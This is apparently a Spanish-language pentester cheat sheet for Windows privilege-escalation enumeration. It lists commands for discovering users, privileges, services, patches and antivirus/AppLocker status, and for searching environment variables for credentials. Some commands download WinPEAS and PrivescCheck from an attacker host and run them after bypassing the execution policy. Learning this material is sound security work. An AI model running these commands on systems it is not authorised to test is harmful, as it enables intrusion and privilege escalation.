Enumeración del Sistema Windows
Información del Usuario
powershell
whoami
hostname
whoami /user
whoami /groups
whoami /groups /fo listInformación del Sistema Operativo
powershell
systeminfo
[environment]::OSVersion.Version
Get-WmiObject -Class win32_operatingsystemVersión Exacta de Windows
powershell
wmic os get buildnumber
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
systeminfo | findstr /i "build"Información de Red
powershell
ipconfig /all
ipconfig
route print
netstat -r
netstat -ano
netstat -anob
Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
arp -aSecurity Identifiers (SID)
Windows usa SIDs para identificar usuarios, grupos y recursos. Entenderlos es clave para escalada de privilegios.
Estructura de SID
S-1-5-21-1336799502-1441772794-948155058-1001
│ │ │ │ │ │ │ │
│ │ │ │ │ │ │ └─ RID (Relative ID)
│ │ │ │ │ │ └──────────── Autoridad del dominio
│ │ │ │ └───────────┴───────────────────────── Sub-autoridades
│ │ │ └────────────────────────────────────────── Autoridad identificadora (5=NT Authority)
│ │ └───────────────────────────────────────────── Revisión (siempre 1)
│ └─────────────────────────────────────────────── "S" = es un SID
└───────────────────────────────────────────────── Prefijo obligatorioSIDs Comunes (Built-in)
powershell
S-1-5-18 = SYSTEM (Local System)
S-1-5-19 = LOCAL SERVICE
S-1-5-20 = NETWORK SERVICE
S-1-5-32-544 = BUILTIN\Administrators
S-1-5-32-545 = BUILTIN\Users
S-1-5-32-551 = BUILTIN\Backup OperatorsVer SID del Usuario Actual
powershell
whoami /user
# Resultado:
# User Name SID
# ================= =======================================
# dominio\usuario S-1-5-21-1336799502-1441772794-948155058-1001Encontrar SID de otro usuario
powershell
Get-LocalUser | Select-Object Name, SID
# O via PowerShell
$user = New-Object System.Security.Principal.NTAccount("dominio", "usuario")
$sid = $user.Translate([System.Security.Principal.SecurityIdentifier])
$sid.Value
# Resultado: S-1-5-21-1336799502-1441772794-948155058-1001Grupos Locales
powershell
net localgroup
Get-LocalGroup
net localgroup Administrators
Get-LocalGroupMember -Group "Administrators"
Get-LocalGroupMember "Backup Operators"
Get-LocalGroupMember "Remote Desktop Users"
Get-LocalGroupMember "Remote Management Users"
Get-LocalGroupMember "Event Log Readers"
Get-LocalGroupMember "DnsAdmins"
Get-LocalGroupMember "Print Operators"
Get-LocalGroupMember "Server Operators"Privilegios del Usuario Actual
powershell
whoami /priv
whoami /priv /fo list
whoami /priv | findstr /i "SeBackup\|SeRestore\|SeTakeOwnership\|SeImpersonate\|SeAssignPrimaryToken\|SeLoadDriver\|SeDebugPrivilege"Servicios en Ejecución
powershell
Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}
Get-Service <service_name>
sc query <service_name>
sc qc <service_name>
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Get-CimInstance -ClassName win32_service | Where-Object {$_.PathName -notlike 'C:\Windows\*'} | Select Name, PathName, StartName, State
Get-CimInstance -ClassName win32_service | Where-Object {$_.StartName -like "*SYSTEM*" -or $_.StartName -like "*LocalService*"} | Select Name, PathName, StartNameProcesos en Ejecución
powershell
Get-Process
Get-Process | Select-Object Name, Id, Handles, CPU, Memory
tasklist
tasklist /svc
Get-Process -IncludeUserName | Select-Object ProcessName, Id, UserName
Get-Process -Name <process_name>
Get-Process <process_name> | Select-Object *Protecciones del Sistema
powershell
Get-MpComputerStatus
Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled, BehaviorMonitorEnabled, IoavProtectionEnabled
Get-MpComputerStatus | Select-Object AMServiceEnabled, AntivirusEnabled, AntispywareEnabled, OnAccessProtectionEnabled
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /v EnableLUA
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /v ConsentPromptBehaviorAdmin
Confirm-SecureBootUEFIParches y Actualizaciones
powershell
Get-HotFix | ft -AutoSize
wmic qfe list brief
Get-CimInstance -Class win32_quickfixengineering | Select HotFixID, Description, InstalledOn
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }Aplicaciones Instaladas
powershell
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname, displayversion
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname, displayversion
wmic product get name, version, vendor
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Where-Object {$_.DisplayName -like "*Java*"}Puertos Abiertos
powershell
netstat -ano | findstr LISTENING
Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
netstat -ano | findstr :3306
tasklist | findstr <PID>Named Pipes
powershell
Get-ChildItem \\.\pipe\
accesschk.exe -accepteula \\.\Pipe\lsass -v
accesschk.exe -accepteula -w \pipe\<pipe_name> -vVariables de Entorno
powershell
Get-ChildItem env:
$env:PATH
$env:USERPROFILE
$env:TEMP
$env:USERNAME
echo %TEMP%
echo %USERPROFILE%
Get-ChildItem env: | Select-Object Name, Value | where {$_.Value -like "*password*" -or $_.Value -like "*credential*"}Información del Computador
powershell
Get-ComputerInfo
Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, WindowsBuildLabExMemoria y CPU
powershell
Get-WmiObject Win32_ComputerSystem | Select-Object TotalPhysicalMemory
Get-WmiObject Win32_OperatingSystem | Select-Object TotalVisibleMemorySize, FreePhysicalMemory
Get-WmiObject Win32_Processor | Select-Object Name, NumberOfCores, NumberOfLogicalProcessorsRegistro del Sistema - Variables Sensibles
powershell
reg query HKCU\Environment
reg query HKLM\System\CurrentControlSet\Control\Session\ Manager\EnvironmentHerramientas Automatizadas de Enumeración
WinPEAS
powershell
# Descargar
iwr -uri http://192.168.1.100/winPEASx64.exe -OutFile winpeas.exe
# Ejecutar y guardar salida
.\winpeas.exe > output.txt
# Ver con colores
.\winpeas.exe | MoreQué buscar en salida de WinPEAS:
- Rojo: Privs elevables, servicios vulnerables, archivos sensibles
- Verde: Protecciones habilitadas (no explotables)
- Cyan: Usuarios activos
- Azul: Usuarios deshabilitados
PrivescCheck
powershell
# Descargar
iwr -uri http://192.168.1.100/PrivescCheck.ps1 -OutFile PrivescCheck.ps1
# Bypass de política de ejecución
Set-ExecutionPolicy Bypass -Scope process -Force
powershell -ep bypass
# Importar y ejecutar
. .\PrivescCheck.ps1
Invoke-PrivescCheckWES-NG (Windows Exploit Suggester)
Se ejecuta en tu máquina Kali, NO en el objetivo (más sigiloso)
bash
# En Kali - Instalación
git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update
# En objetivo - Obtener información
systeminfo > sysinfo.txt
# Transferir a Kali
scp usuario@objetivo:sysinfo.txt .
# Analizar en Kali
python3 wes.py sysinfo.txt
# Resultado: lista de CVEs aplicables